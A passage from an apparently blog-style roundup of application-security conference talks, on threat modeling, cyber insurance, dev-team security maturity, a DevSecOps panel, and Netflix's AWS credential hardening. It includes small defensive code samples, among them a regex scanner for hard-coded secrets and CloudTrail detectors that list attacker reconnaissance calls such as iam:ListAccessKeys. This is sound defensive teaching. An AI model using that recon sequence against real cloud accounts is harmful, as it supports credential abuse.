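print(wiki.name, risk_score(wiki), risk_tier(risk_score(wiki)))  # wiki 1 low
```

An additive model like this is easy to explain to dev teams, which matters more early on than getting the weights exactly right.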

Identify teams/orgs to partner with
Consider policies and compliance requirements, business criticality, etc.

Create an application inventory
Automate as much of it as possible so that you’re not constantly maintaining it.

Then, leverage this info in kicking off partnership discussions, consolidate and prioritize the security asks for dev teams, and create an easy to read and track security initiatives doc.

During your ongoing syncs with teams, ask, “What can we do for you?” and “How can we help you?”

Key Takeaways

Use tooling and automation to make data informed (but not wholly driven) decisions. Leverage the understanding you have about the app team’s ecosystem, their world, historical challenges they’ve had, and your knowledge of the relevant business context.

Give dev teams a single security point of contact to make communicating with them and answering their questions easier and less frustrating for them. This in turn helps build a long term trust based relationship with the partnering teams.

A Seat at the Table

Adam Shostack, President, Shostack & Associates
abstract slides video

By having a “seat at the table” during the early phases of software development, the security team can more effectively influence its design. Adam describes how security can earn its seat at the table by using the right tools, adapting to what’s needed by the current project, and the soft skills that will increase your likelihood of success.

At a high level, there are two phases in software development.

First, there is dialogue about an idea, where things are fluid, not fixed. Here we’re building prototypes and doing experiments, exploring approach ideas and their consequences, asking questions like “What if…” and “How about…”

As things get hammered out we move to discussion, where we’ve decided on many of the details so things are more fixed than fluid, we’ve committed to an idea, and are working towards production code.

A common challenge is that the security team is only involved in the discussion phase, after many important decisions have already been made, like the technologies in use, how the system will be architected, and how everything will fit together. At this point, any suggestions (or demands) from the security team to make significant changes to the tech used or overall architecture will be met with resistance, as these decisions have already been made and changing them will set the project back.

Security needs a seat at the table, so we can provide input during the design phase.

But seating is limited at the table. There are already a number of parties there, like the QA team, IT, users, engineering, etc. Everyone wants a seat. However, studies have shown that as team sizes grow larger it becomes more difficult to build consensus and thus make progress, so there’s motivation to keep the table small.

Today, security often doesn’t get a place at the table. If all you ever say at planning meetings, regardless of what is proposed, is “That would be insecure” or “We’ll run a vuln scan / SAST / fuzzing,” then developers will think, “OK great, I know what security is going to say, so we don’t need them here in this meeting.”

Seat at the Table: ZAP SAST
Just like friends don’t let friends do meth, friends don’t let friends send developers 1,000 page SAST scan reports.

What’s Needed For A Seat At The Table?

  • Tools that work in dialogue - Tools need to work when things are fluid not fixed.
  • Consistency - The same problems or challenges should get the same solution recommendations. Too often developers will get different advice from different security people, which is confusing and makes it hard for them to do their jobs effectively.
  • Soft skills! - At a small table, if someone doesn’t play well with others, they don’t get invited back.

Threat Modeling as a Design Toolkit

Structure Allows Consistency

Threat modeling can help us get a seat at the table, and having a consistent structure and approach can make threat modeling much more successful.

Seat at the Table: 4 Questions
  • The threat model can be created in some design software or done informally on a whiteboard.
  • When discussing what can go wrong, frameworks like STRIDE and kill chains provide structure to the brainstorming so we’ll be able to answer the question in a consistent, repeatable way, and come to similar conclusions.
  • By discussing what we’re going to do about these threats, we can start planning the security controls, architecture decisions, etc. before a single line of code is written, rather than trying to use duct tape later.
  • Reflect on the threat modeling process afterwards. Did we get value out of this? What do we keep doing? What should we do differently next time? Like your development processes, how your company threat models will evolve over time to best fit your company’s unique environment.

Threat Modeling Is A Big Tent

Like developing software, the process of threat modeling can vary significantly: it can be lightweight, agile, fast, and low effort, or big, complicated, and slow. Which one makes sense depends on the project you’re on. Similarly, there are also different tools and deliverables that can be involved.

Think of threat modeling as being composed of building blocks, like how a software service can be composed of many microservices. If you think that threat modeling can only be done one way, like it’s a big monolith that cannot be decomposed into smaller parts, then you’ll lose the value of being able to take advantage of the building blocks that fit with your team’s needs.

Soft Skills

Soft skills are crucial in security.

Seat at the Table: Security Cleaning Up After DevOps
While security people might like making jokes like this, this damages rapport with developers and doesn’t help us get our jobs done.

You might feel like soft skills feel “unnatural.” That’s OK, everything we do starts that way! When you first started programming, did writing code feel natural? Probably not. Soft skills, like anything, are skills we need to learn and practice, by doing them.

Here are a few critical soft skills.

Respect

Pay attention to the person speaking: In meetings and informally during discussions. Don’t interrupt, read your email, or have side conversations. This conveys that you don’t value what the person is saying.

Pay attention to the people not speaking: Are we giving everyone the opportunity to speak? Oftentimes there are people who are very vocal and loud who can drown out other people. Everyone has something to add, let their voice be heard.

Active Listening

Pay attention, and show that you’re listening with your body language and gestures. Let people finish what they’re saying; don’t just hear the first 10 words and then interrupt, telling them how their idea won’t work. One effective structure that will feel unnatural at first is:

I hear you saying [reflect back what they told you]…

Assume Good Intent

No one is paid to make your life harder. Everyone is just trying to get their job done, whether it’s shipping new features, designing the product, marketing it, etc. Instead of thinking they’re dumb or uninformed, ask yourself:

What beliefs might they have that would lead them to act or feel this way?

Everyone’s behavior makes sense within the context of their beliefs.

Diversity

Adam believes diversity has intrinsic value, as it allows you to take advantage of all of the skills, aptitudes, knowledge, and backgrounds that can make your company successful.

However, he’s found that you tend to make better progress with executives by making the business case for diversity. Rather than promoting diversity for its intrinsic value, make the argument that it will help the business. For example, you can reference studies that show that diverse teams are more effective; a more broadly representative team can better connect with your diverse user base; and the types of behaviors and environments that support diversity (e.g. being welcoming and supportive) also make your team or company a more attractive place to work, making it easier to hire and retain top talent. Conversely, a culture that drives non-traditional candidates away is probably not an environment that people want to be in and will likely cause challenges when you need to interface with other teams in the company.

Questions

What do you do if your company had a bad event and it caused people to keep coming to the security team for help and it’s overwhelmed your team?

This is a great opportunity to train developers how to threat model so they can start to stand on their own, looping in the security team in harder cases as needed.

How do we know if we did a “good job”?

There are basically two types of metrics, mechanical and qualitative. For mechanical, you can ask measurable questions like, “Do we have a diagram? Did we find threats against this service? Did we file user stories or acceptance tests for each of the things we found?”

On the qualitative side, during retrospectives, you can ask questions like, “Are we happy with the time we spent on threat modeling? Do we feel it paid off well?”

How do you make the business case for giving developers more secure coding training?

Without secure coding training, developers are more likely to introduce vulnerabilities into the software they write. Once this code has been tested, delivered, and is in production, potentially with other components that rely on it, it’s very expensive to go back and fix it.

By having developers write secure software in the first place, you can limit the amount of rework that has to be done, which improves the predictability of shipping new features. You’re reducing the likelihood that you’ll discover new problems days, weeks, or months later and have to interrupt what you’re currently working on to fix them, at which time the developer who introduced the issue may have forgotten most of the relevant context.

Metrics can also be really valuable here. Track the number and types of vulnerabilities you’re discovering in various code bases so you can show that after the training, your SAST / DAST tools or pen tests are finding fewer issues, which is allowing you to spend more time building new features and less time fixing issues. See Data-Driven Bug Bounty for more ideas on leveraging vulnerability data to drive AppSec programs.

Cyber Insurance: A Primer for Infosec

Nicole Becher, Director of Information Security & Risk Management, S&P Global Platts
abstract slides video

This talk is a really fun and info-dense whirlwind tour of cyber insurance. Frankly, there’s too much good content for me to cover here, so I’ll do my best at providing an overview of the content Nicole covers with a few of the key points.

Nicole gave this talk because the cyber insurance industry is growing rapidly and at some point, we in the infosec community are going to have to be involved, so she wants to describe the key terminology and context we need to be reasonably informed.

Insurance is a mechanism individuals or organizations use to limit their exposure to risk. Individuals band together to form groups that pay for losses. By forming groups, the risk is spread and no individual is fully exposed.

Nicole gives a quick history of the insurance industry, from Hammurabi, medieval guilds, Pascal’s tables (which led to actuarial tables, underwriting, and affordable insurance) to Ben Franklin.

The insurance industry has evolved over time, based on new technology and risks; for example, fire insurance after the great fire of London, automobile insurance once cars became widespread, and now cyber insurance.

Insurance Industry Today

There are 3 major market participants:

  1. Brokers / Agents: Act as middlemen between the insurance buyer and the carrier. Must be licensed and regulated. They develop the sales infrastructure needed to sell insurance on behalf of the carrier.
  2. Carriers: The company that holds the insurance policy; they collect premiums and are liable for a covered claim. They pool the risk of a large number of policy holders by paying out relatively few claims while collecting premiums from the majority of policyholders who don’t file claims over the same period.
  3. Reinsurers: Insurance purchased by insurance carriers to mitigate the risk of sustaining a large loss. The carriers sell off portions of their portfolio to a reinsurer that aggregates the risk at a higher level. This spreading of risk enables an individual insurance company to take on clients whose coverage would be too much of a burden for a single insurance company to handle alone.
Reinsurance is insurance for insurers
Reinsurance blew my mind at first, but it makes sense.

Nicole walks through several types of insurance companies, including standard lines, excess lines, captives, direct sellers, domestic/alien, Lloyd’s of London, mutual companies, and stock companies.

Cyber Insurance - Background

The Cyber Insurance market is still early: only 15% of US companies have it and only 1% world-wide. As of 2016, it’s a $2.5B - $3.5B market and it’s estimated to be a $12B - $20B market by 2020.

A key distinction is differentiating between first party and third party insurance, both of which can be held by a company, individual, or group of individuals.

First party covers the policy holder against damages or losses to themselves or their property. Examples:

  • Breach notification
  • Credit monitoring services
  • PR campaign services
  • Compensating the business for lost income
  • Paying a ransom or extortionist who holds data hostage

Third party protects the policy holder against liability for damages or losses they caused to a person or property. Examples:

  • Covers the people and businesses “responsible” for the systems that allowed a data breach to occur
  • Lawsuits relating to a data breach
  • Privacy liability
  • Technology errors & omissions
  • Writing and shipping vulnerable code/IoT

Key Terms

Coverage is the amount of risk or liability covered by a specific insurance policy, paid out up to a limit. A typical insurance policy is a collection of coverages, each of which has its own sub-limit.

Exclusions define the types of risk that will not be covered.

Important Note: coverages will typically specify whether it’s for first party or third party losses, and it’s critical to examine these terms.
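Here is a toy sketch of how coverages, sub-limits, and exclusions interact. It is a deliberate simplification: it assumes each loss maps to exactly one coverage, and it ignores deductibles, aggregate policy limits, and the actual policy wording that decides real claims. The coverage names and dollar amounts are made up.

```python
def estimate_payout(losses, sub_limits, exclusions):
    """Return the payout per loss category.

    losses:     dict of category -> loss amount
    sub_limits: dict of covered category -> maximum payout for that coverage
    exclusions: set of categories the policy explicitly does not cover
    """
    payouts = {}
    for category, loss in losses.items():
        if category in exclusions or category not in sub_limits:
            # Excluded or simply not part of the policy: nothing is paid.
            payouts[category] = 0
        else:
            # Covered: pay the loss, capped at that coverage's sub-limit.
            payouts[category] = min(loss, sub_limits[category])
    return payouts


# Hypothetical policy and incident, for illustration only.
sub_limits = {"incident_response": 500_000, "business_interruption": 1_000_000}
exclusions = {"loss_of_ip"}
losses = {
    "incident_response": 200_000,
    "business_interruption": 1_500_000,
    "loss_of_ip": 750_000,
}

payouts = estimate_payout(losses, sub_limits, exclusions)
print(payouts)
print("uncovered:", sum(losses.values()) - sum(payouts.values()))
```

In this made-up incident the business eats $1.25M of a $2.45M loss, split between the amount above the business interruption sub-limit and the excluded IP loss, which is why the sub-limits and exclusions deserve as much attention as the headline coverage number.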

Example Policies

Nicole then walks through a number of example policies composed of several coverage subcomponents, each having their own risk area and sub-limit. The examples are: incident response, cyber crime, system damage and business interruption, network security and privacy liability, media liability, technology errors and omissions, and court attendance costs.

Common Exclusions

Common exclusions that will not be covered by cyber insurance include: property damage or bodily injury due to security incidents, loss of IP, acts of war and terrorism (you’ve been hacked by a nation state), unlawful data collection (you collected data you shouldn’t have), failure to follow minimum security expectations that leads to a breach, and core Internet failures (e.g. in root DNS servers).

You need to negotiate exclusions. They are important and vary by carrier. The devil is in the details.

Nicole concludes with a number of challenges underwriters face, the people who evaluate risk and determine policy pricing, as well as some important legal tests of cyber insurance.

Can Cyber Insurance Help Align Incentives?
One point that Nicole made, that I thought was neat, was that hopefully cyber insurance will eventually align economic incentives for security teams to do the right thing, not just because the security manager doesn’t want to get fired or have their company in the news. There have been a number of similar historical cases, like when homes had to be built to a fire-resistant code to be covered under the fire insurance Ben Franklin set up. Ideally, cyber insurance will be able to map risk to specific controls, which security teams can then use to justify headcount and budget, measurably improving their company’s security.

You can learn more and read some public cyber insurance policies in the SERFF Filing Access system, an online electronic records system managed by the National Association of Insurance Commissioners (NAIC).

(in)Secure Development - Why some product teams are great and others aren’t…

Koen Hendrix, InfoSec Dev Manager, Riot Games
summary abstract slides video

Koen describes analyzing the security maturity of Riot product teams, measuring that maturity’s impact quantitatively using bug bounty data, and discusses 1 lightweight prompt that can be added into the sprint planning process to prime developers about security.

Security Maturity Levels

Based on observing how development teams discuss security and interact (or don’t) with the security team, Koen groups dev teams into 4 security maturity levels.

Teams at these maturity levels range from largely not thinking about security (Level 1), to having one or two security advocates (Level 2), to security being a consistent part of discussions but it’s not yet easy and natural (Level 3), to security consciousness being pervasive and ever-present (Level 4).

Measuring Impact of Security Maturity Level

To examine if a dev team’s level had a measurable impact on the security of the code bases they worked on, Koen analyzed Riot’s 2017 bug bounty data grouped by team maturity level. The differences were clear and significant.

Compared to teams at Level 1, teams at Levels 2-4 had:

  • A 20% / 35% / 45% reduced average bug cost
  • A 35% / 55% / 70% reduced average time to fix
  • The average issue severity found from internal testing was 30% / 35% / 42% lower

| | Level 1 - Absence | Level 2 - Reactive | Level 3 - Proactive Process | Level 4 - Proactive Mindset |
| --- | --- | --- | --- | --- |
| Avg $ Per Bug | $1 | $0.8 | $0.65 | $0.55 |
| Avg Time to Fix High Risk | 1 | 0.65 | 0.45 | 0.3 |
| Avg Issue Severity | $1 | $0.7 | $0.65 | $0.58 |

  • Avg $ Per Bug and Avg Time to Fix High Risk are fixed to $1 / 1 unit of time for Level 1 teams and Levels 2-4 are expressed in comparison to Level 1.
  • Avg Issue Severity - if bugs found through internal security reviews had been discovered through bug bounty, how expensive would they have been?
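The percentages quoted above follow directly from the relative values: each reduction is simply one minus the value relative to Level 1. A quick check, using only the numbers reported in this section (the dictionary keys are my own labels):

```python
# Values for Levels 1-4, each expressed relative to Level 1 (taken from the figures above).
RELATIVE_TO_LEVEL_1 = {
    "avg_cost_per_bug": [1.00, 0.80, 0.65, 0.55],
    "avg_time_to_fix_high_risk": [1.00, 0.65, 0.45, 0.30],
    "avg_issue_severity": [1.00, 0.70, 0.65, 0.58],
}


def percent_reduction(relative_value):
    """Percent reduction versus the Level 1 baseline of 1.0."""
    return round((1 - relative_value) * 100)


reductions = {
    metric: [percent_reduction(v) for v in values[1:]]  # skip the Level 1 baseline
    for metric, values in RELATIVE_TO_LEVEL_1.items()
}

for metric, levels_2_to_4 in reductions.items():
    print(metric, levels_2_to_4)
# avg_cost_per_bug [20, 35, 45]
# avg_time_to_fix_high_risk [35, 55, 70]
# avg_issue_severity [30, 35, 42]
```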

Prioritizing Security Investment

Riot Games chose to focus on raising Level 1 and 2 teams to Level 3, as that yields the biggest security benefits vs effort required, makes teams’ security processes self-sustaining without constant security team involvement, and makes them more accepting of future security tools and processes provided by the security team.

They did this by shaping development team behaviour, rather than purely focusing on automation and technical competencies and capabilities.

How to uplevel dev teams?

During standard sprint planning, dev teams now ask the following prompt and spend 2-3 minutes discussing it, recording the outcomes as part of the story in Jira/Trello/etc.:

How can a malicious user intentionally abuse this functionality? How can we prevent that?

Though the dev team may not think of every possible abuse case, this approach is highly scalable, as it primes devs to think about security continuously during design and development without the security team needing to attend every meeting (which is not feasible).

Final Thoughts

  • The security level of a team influences how the security team should interact with them.
    • If the majority of your teams are Level 1 and 2, rolling out optional tooling and processes isn’t going to help. First, you need to level up how much they care about security.
  • Work with Level 3 and 4 teams when building new tooling to get early feedback and iterate to smooth out friction points before rolling the tooling out to the rest of the org.

Read the full summary here.

Lessons Learned from the DevSecOps Trenches

Clint Gibler, Research Director, NCC Group

Dev Akhawe, Director of Security Engineering, Dropbox

Doug DePerry, Director of Product Security, Datadog

Divya Dwarakanath, Security Engineering Manager, Snap

John Heasman, Deputy CISO, DocuSign

Astha Singhal, AppSec Engineering Manager, Netflix

summary abstract video

Learn how Netflix, Dropbox, Datadog, Snap, and DocuSign think about security. A masterclass in DevSecOps and modern AppSec best practices.

Great “Start Here” Resource for Modern AppSec / DevSecOps
When people ask me, “What’s on your shortlist of resources to quickly get up to speed about how to think about security and how to run a modern security program?” this is one of the handful I share. Check out the full summary for this one, I bet you’ll be glad you did.

Though the security teams may have different names at different companies (e.g. AppSec vs ProdSec), they tend to have the same core responsibilities: developer security training, threat modeling and architecture reviews, triaging bug bounty reports, internal pen testing, and building security-relevant services, infrastructure, and secure-by-default libraries.

Commonalities

Everyone built their own internal continuous code scanning platforms that essentially run company-specific greps that look for things like hard-coded secrets, known anti-patterns, and enforcing that secure wrapper libraries are being used (e.g. crypto, secrets management).
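To give a feel for what “company-specific greps” can mean in practice, here is a minimal sketch of a rule-based scanner. It is not any panelist’s actual platform: the rule names and the patterns are hypothetical examples, and a real system would add things like allowlists, per-repo configuration, and routing findings to owners.

```python
import re

# Hypothetical rules: a leaked secret, a known anti-pattern, and a call that
# should go through a secure wrapper library instead.
RULES = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "hardcoded-password": re.compile(r"""password\s*=\s*['"][^'"]+['"]""", re.IGNORECASE),
    "raw-md5": re.compile(r"\bhashlib\.md5\("),
}


def scan_source(path, text):
    """Return (path, line_number, rule_name) for every rule hit in the text."""
    findings = []
    for line_number, line in enumerate(text.splitlines(), start=1):
        for rule_name, pattern in RULES.items():
            if pattern.search(line):
                findings.append((path, line_number, rule_name))
    return findings


sample = "\n".join([
    "import hashlib",
    'AWS_KEY = "AKIAIOSFODNN7EXAMPLE"  # AWS documentation example key, not a real secret',
    "digest = hashlib.md5(data).hexdigest()",
    'password = "hunter2"',
])

for finding in scan_source("app.py", sample):
    print(finding)
# ('app.py', 2, 'aws-access-key-id')
# ('app.py', 3, 'raw-md5')
# ('app.py', 4, 'hardcoded-password')
```

Simple patterns like these are fast and easy to tune to your own code base, which is a big part of why teams preferred them to general-purpose scanners.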

SAST and DAST tools were generally not found to be useful due to having too many FPs, being too slow and not customizable, and failing to handle modern frameworks and tech (e.g. single page apps).

Everyone emphasized the importance of building secure-by-default wrapper libraries and frameworks for devs to use, as this can prevent classes of vulnerabilities and keep you from getting caught up in vuln whack-a-mole.

  • This can be hard if you have a very polyglot environment but it’s worth it.
  • Determine where to invest resources by a) reviewing the classes of bugs your company has had historically and b) having conversations with dev teams to understand their day-to-day challenges.

Building relationships with engineering teams is essential to knowing relevant upcoming features and services, being able to advise engineering decisions at the outset, and spreading awareness and gaining buy-in for secure wrappers.

When you’re building a tool or designing a new process you should be hyper aware of existing developer workflows so you don’t add friction or slow down engineering. Make sure what you’ve built is well-documented, has had the bugs ironed out, and is easy for devs to use and integrate.

  • If possible, include features that provide value to devs if they adopt what you’ve built (e.g. telemetry) and try to hitch your security efforts to the developer productivity wagon.

Invest in tooling that gives you visibility - how is code changing over time? What new features and services are in the pipeline? What’s happening to your apps in production?

Differences

Netflix has gotten value from an internal security questionnaire tool they’ve built, while Snap and Dropbox had their version rejected by dev teams. This was due to wanting to have in-person discussions and the lack of collaboration features, respectively.

While everyone agreed on the importance of having strong relationships with engineering teams, John argued that individual relationships alone are not sufficient: dev teams grow faster than security teams and people move between teams or leave the company. Instead, you need to focus on processes and tooling (e.g. wrapper libraries and continuous scanning) to truly scale security.

For most of the panel members, the security teams wrote secure wrappers and then tried to get devs to adopt them. The Dropbox AppSec team actually went in and made the code changes themselves. This had the benefit of showing them that what they thought was a great design and solid code actually had poor dev UX and high adoption friction.

Favorite Quotes

“What are all the ways throughout the SDLC where we can have a low friction way of getting visibility?”
-John Heasman

“Prioritize your biggest risks and automate yourself out of each and every one of them.”
-Divya Dwarakanath

“If you don’t have a solution to point devs to, then you finding bugs doesn’t really matter.”
-Astha Singhal

“You have to brutally prioritize. Work on the things that are most likely to bite you the worst, while keeping a list of the other things that you can gradually get to as you have time and as the security team grows.”
-Doug DePerry

“Hitch your security wagon to developer productivity.”
-Astha Singhal

“First, invest in gaining visibility. Then start automating once you know exactly the situation you’re in and the data sets you’re dealing with.”
-Doug DePerry

“There’s no silver bullet, just lots and lots of lead bullets.”
-Devdatta Akhawe

Don’t spend too much time trying to ensure you’re working on the perfect task to improve your company’s security. Choose something that makes sense and get started!

This panel was an awesome, dense braindump of smart people describing how security works at their companies. I highly recommend you read the full summary here. You can also check out the full transcript here.

Netflix’s Layered Approach to Reducing Risk of Credential Compromise

Will Bengston, Senior Security Engineer, Netflix
Travis McPeak, Senior Security Engineer, Netflix
abstract slides video

An overview of efforts Netflix has undertaken to scale their cloud security, including segmenting their environment, removing static keys, auto-least privilege of AWS permissions, extensive tooling for dev UX (e.g. using AWS credentials), anomaly detection, preventing AWS creds from being used off-instance, and some future plans.

Segment Environment Into Accounts

Why? If the account gets compromised, the damage is contained.

The Netflix security teams have built a nice Paved Road for developers, a suite of useful development tools and infrastructure. When you’re using the Paved Road, everything works nicely and you have lots of tools available to make you more efficient.

But there are some power users who need to go outside the Paved Road to accomplish what they need to do.

At Netflix, the security team generally can’t block developers - they need to avoid saying “no” when at all possible.

Useful for separation of duties: So the security team will instead put these power users in their own AWS account so they can’t affect the rest of the ecosystem.

Useful for sensitive applications and data: Only a limited set of users can access these apps and data.

Reduce friction by investing in tooling to C.R.U.D. AWS accounts. If you want to do account-level segmentation, you need to invest in tooling that makes it easy to, for example, spin up, delete, and modify meta info for accounts. The Netflix cloud security team has invested heavily in these areas.

Remove Static Keys

Why? Static keys never expire and have led to many compromises, for example, when AWS keys in git repos are leaked to GitHub.

Instead, they want short-lived keys, delivered securely, that are rotated automatically.

Netflix does this by giving every application a role, and then the role is provided with short-lived credentials by the EC2 metadata service.

Permission Right Sizing

For many companies, it can be difficult to keep up with all of the services you’re running, and it’s easy for a service to get spun up and then forgotten if its developer leaves the company or gets moved onto a different team. This represents recurring risk to your company, as these apps may have been given sensitive AWS permissions.

Netflix reduces this risk via RepoKid (source code, Enigma 2018 talk video). New apps at Netflix are granted a base set of AWS permissions. RepoKid gathers data about app behavior and automatically removes AWS permissions, rolling back if failure is detected.

RepoKid
When you build a cool tool, you gotta get a cool logo

This causes apps to converge to least privilege without security team interaction, and unused apps converge to zero permissions! 🎆

RepoKid uses Access Advisor and CloudTrail as data sources. Access Advisor allows it to determine, for a given service, whether it has been used within a threshold amount of time. CloudTrail provides: what actions have been called, when, and by whom?
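The core decision can be sketched in a few lines. This is not RepoKid’s code: the function, the 90-day threshold, and the sample data are assumptions for illustration, and the sketch leaves out the parts that make the real tool safe to run, such as rolling back when a removal causes failures.

```python
from datetime import datetime, timedelta


def unused_services(granted_services, last_used, now, threshold_days=90):
    """Return granted services that were never used or not used recently.

    granted_services: set of service names the role is allowed to call
    last_used:        dict of service name -> datetime of last observed use
                      (the kind of data Access Advisor provides)
    threshold_days:   hypothetical cutoff; pick what fits your environment
    """
    cutoff = now - timedelta(days=threshold_days)
    unused = []
    for service in sorted(granted_services):
        used_at = last_used.get(service)
        if used_at is None or used_at < cutoff:
            unused.append(service)
    return unused


# Illustrative data only.
now = datetime(2019, 1, 1)
granted = {"s3", "sqs", "dynamodb"}
last_used = {"s3": datetime(2018, 12, 20), "sqs": datetime(2018, 6, 1)}

to_remove = unused_services(granted, last_used, now)
print(to_remove)  # ['dynamodb', 'sqs']
```

Run repeatedly, a rule like this is what makes an abandoned app drift toward zero permissions: once nothing is being used, everything falls past the cutoff.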

Paved Road for Credentials

They wanted to have a centralized place where they could have full visibility into Netflix’s use of AWS credentials, so they built a suite of tools where they could provision credentials by accounts, roles, and apps as needed. If they could ensure that everyone used these tools, they’d know, for every AWS credential, who requested them and how they’re being used.

Before they built this tooling, developers would SSH onto boxes and access creds there, or curl an endpoint and do a SAML flow, but there wasn’t one solidified process to access creds, which made it difficult to monitor.

So the Netflix cloud security team built a service, ConsoleMe, that can handle creating, modifying, and deleting AWS creds.

Netflix's Layered Approach: ConsoleMe
Users can request credentials via a web interface using SSO or through a CLI

Another advantage of this approach is that when ConsoleMe is creating creds, it automatically injects a policy that IP restricts the creds to the VPN the requester is connected to, so even if the creds accidentally get leaked, they won’t work.
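For a sense of what an IP-restricting policy can look like, here is a sketch that builds one as a plain dictionary. I don’t know the exact policy ConsoleMe injects, so treat this as an assumption: it uses the standard IAM `NotIpAddress` condition operator with the `aws:SourceIp` condition key, and the helper name and CIDR range are placeholders.

```python
import json


def ip_restricted_policy(allowed_cidrs):
    """Build an IAM policy document that denies every action when the
    request does not come from one of the allowed CIDR ranges."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Deny",
                "Action": "*",
                "Resource": "*",
                "Condition": {
                    "NotIpAddress": {"aws:SourceIp": list(allowed_cidrs)}
                },
            }
        ],
    }


# 203.0.113.0/24 is a documentation-only range standing in for a VPN egress range.
policy = ip_restricted_policy(["203.0.113.0/24"])
print(json.dumps(policy, indent=2))
```

Because an explicit deny wins over any allow, attaching a statement like this to short-lived credentials means a copy of them used from anywhere else simply fails.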

Because the cloud security team worked hard to make using ConsoleMe seamless for devs, they no longer see any devs SSHing in to an EC2 instance and getting creds that are valid for 6 hours. Devs instead use the creds they receive from ConsoleMe, which are only valid for 1 hour, reducing potential exposure time.

Benefits:

  • ConsoleMe provides a central place to audit and log all access to creds.
  • Anomaly detection: If someone is trying to request creds to a service they don’t own, or something is behaving strangely, they can detect those anomalies and investigate.

Their biggest win has been locking credentials down to the Netflix environment, so if the creds get leaked in some way there’s no damage.

Delivery Lockdown

Netflix uses Spinnaker for continuous delivery. Several hardening improvements were made, including tagging application roles to specific owners and restricting users so they can only deploy with a role if they own the application in question. Otherwise, a user might be able to escalate their privileges by choosing a role with more permissions than they currently have.

Prevent Instance Credentials from Being Used Off-instance

Goal: If an attacker tries to steal creds (e.g. through SSRF or XXE), the creds won’t work.

See Will’s other talk, Detecting Credential Compromise in AWS for details.

They block AWS creds from being used outside of Netflix’s environment, and attempts to do so are used as a valuable signal of a potential ongoing attack or a developer having trouble, who they can proactively reach out to and help.

The more signals we can get about things going wrong in our environment, the better we can react.

Improving Security and Developer UX
One thing Travis and Will mentioned a few times, which I think is really insightful, is that the logging and monitoring they've set up can both detect potential attacks and let them know when a developer may be struggling, either because they don't know how systems work or because they need permissions or access they don't currently have.

Oftentimes the security team plays the role of locking things down. Things become more secure, but also harder to use. This friction either slows down development or causes people to go around your barriers to get their jobs done.

What's so powerful about this idea is the point that the systems you build to secure your environment can also be used to detect when these systems are giving people trouble, so the security team can proactively reach out and help.

Imagine you were starting to use a new open source tool. You're having trouble getting it to work, and then the creator sends you a DM, "Hey, I see you're trying to do X. That won't work because of Y, but if you do Z you'll be able to accomplish what you're trying to do. Is that right, or is there something else I can help you with?" Holy cow, that would be awesome 😍

One thing I've heard again and again from security teams at a number of companies, for example, in our panel Lessons Learned from the DevSecOps Trenches, is that to really get widespread adoption of security initiatives more broadly in your org, the tooling and workflow needs to not just be easy and frictionless, it ideally also needs to provide additional value / make people's lives better than what they were previously doing.

Keep this in mind next time your security team is embarking on a new initiative. After all, a technically brilliant tool or process isn't that useful if no one uses it.

Detect Anomalous Behavior in Your Environment

Netflix tracks baseline behavior for accounts: they know what apps and users are doing, and they know what’s normal. This lets you do neat things once you realize:

Some regions, resources, & services shouldn’t be used 🛑

Netflix only uses certain AWS regions, resources and services - some they don’t use at all. Thus when activity occurs in an unused region, or an AWS service that is not used elsewhere generates some activity, it’s an immediate red flag that should be investigated.

Unused Services

A common attack pattern: once an attacker gets hold of some AWS credentials or has shell access to an instance, they run an AWS enumeration script that determines what permissions they have by iteratively making a number of API calls. When unused services are called, the Netflix cloud security team is automatically alerted so they can investigate.

This approach has been used to stop bug bounty researchers quickly and effectively.
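The unused region / unused service check can be sketched roughly as follows. The `awsRegion` and `eventSource` fields are part of the CloudTrail record format; the function name and the allowlists are hypothetical, and Netflix's real pipeline is not described in enough detail here to reproduce.

```python
def find_unexpected_activity(events, allowed_regions, allowed_services):
    """Return the CloudTrail-style events that touch a region or service
    outside the allowlists.

    `events` is an iterable of dicts shaped like CloudTrail records.
    Illustrative sketch only; the allowlists are assumptions.
    """
    flagged = []
    for event in events:
        region = event.get("awsRegion")
        service = event.get("eventSource")
        if region not in allowed_regions or service not in allowed_services:
            flagged.append(event)
    return flagged


sample_events = [
    {"awsRegion": "us-east-1", "eventSource": "s3.amazonaws.com", "eventName": "GetObject"},
    {"awsRegion": "ap-south-1", "eventSource": "ec2.amazonaws.com", "eventName": "RunInstances"},
    {"awsRegion": "us-east-1", "eventSource": "sagemaker.amazonaws.com", "eventName": "ListModels"},
]
alerts = find_unexpected_activity(
    sample_events,
    allowed_regions={"us-east-1", "us-west-2"},
    allowed_services={"s3.amazonaws.com", "ec2.amazonaws.com"},
)
```

Here the second event would be flagged for its region and the third for its service. An allowlist tends to be easier to keep correct than a denylist, since new AWS regions and services are flagged by default.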

Anomalous Role Behavior

This is the same idea as for services, but at the application / role level. Applications tend to have relatively consistent behavior, which can be determined by watching CloudTrail.

The cloud security team watches for applications that start behaving very differently as well as common attacker first steps once they gain access (e.g. s3:ListBuckets, iam:ListAccessKeys, sts:GetCallerIdentity, which is basically whoami on Linux). These API calls are useful for attackers, but not something an application would ever need to do.
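A minimal sketch of this role-level check, assuming you already have a per-role baseline of API calls built from historical CloudTrail data. The field names (`eventSource`, `eventName`, `userIdentity.arn`) follow the CloudTrail record format; the baseline structure, function name, and labels are hypothetical.

```python
# API calls named above as common attacker first steps.
RECON_CALLS = {
    ("s3.amazonaws.com", "ListBuckets"),
    ("iam.amazonaws.com", "ListAccessKeys"),
    ("sts.amazonaws.com", "GetCallerIdentity"),
}


def anomalous_calls(events, baseline):
    """Flag calls a role has never made before.

    `baseline` maps a role ARN to the set of (eventSource, eventName)
    pairs seen historically. Calls that are new AND on the recon list
    are labeled "recon"; other new calls are labeled "new".
    """
    findings = []
    for event in events:
        arn = event.get("userIdentity", {}).get("arn", "unknown")
        call = (event.get("eventSource"), event.get("eventName"))
        if call in baseline.get(arn, set()):
            continue  # normal behavior for this role
        label = "recon" if call in RECON_CALLS else "new"
        findings.append((arn, call, label))
    return findings
```

In practice the "new" bucket is likely to be noisy after deploys, so a real system would probably need some way to age calls into the baseline; that part is not covered here.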

Future

Travis and Will share a few items on the Netflix cloud security team’s future road map.

One Role Per User

Traditionally Netflix has had one role that’s common to a class of users; that is, many apps that need roughly the same set of permissions are assigned the same AWS role.

However, there are likely at least slight differences between the permissions these apps need, which means some apps are over-provisioned. Further, grouping many apps under the same role makes it harder to investigate potential issues and do anomaly detection.

In the future, when every user/app has their own AWS role, they can guarantee least privilege as well as do fine-grained anomaly detection.

Remove Users from Accounts They Don’t Use

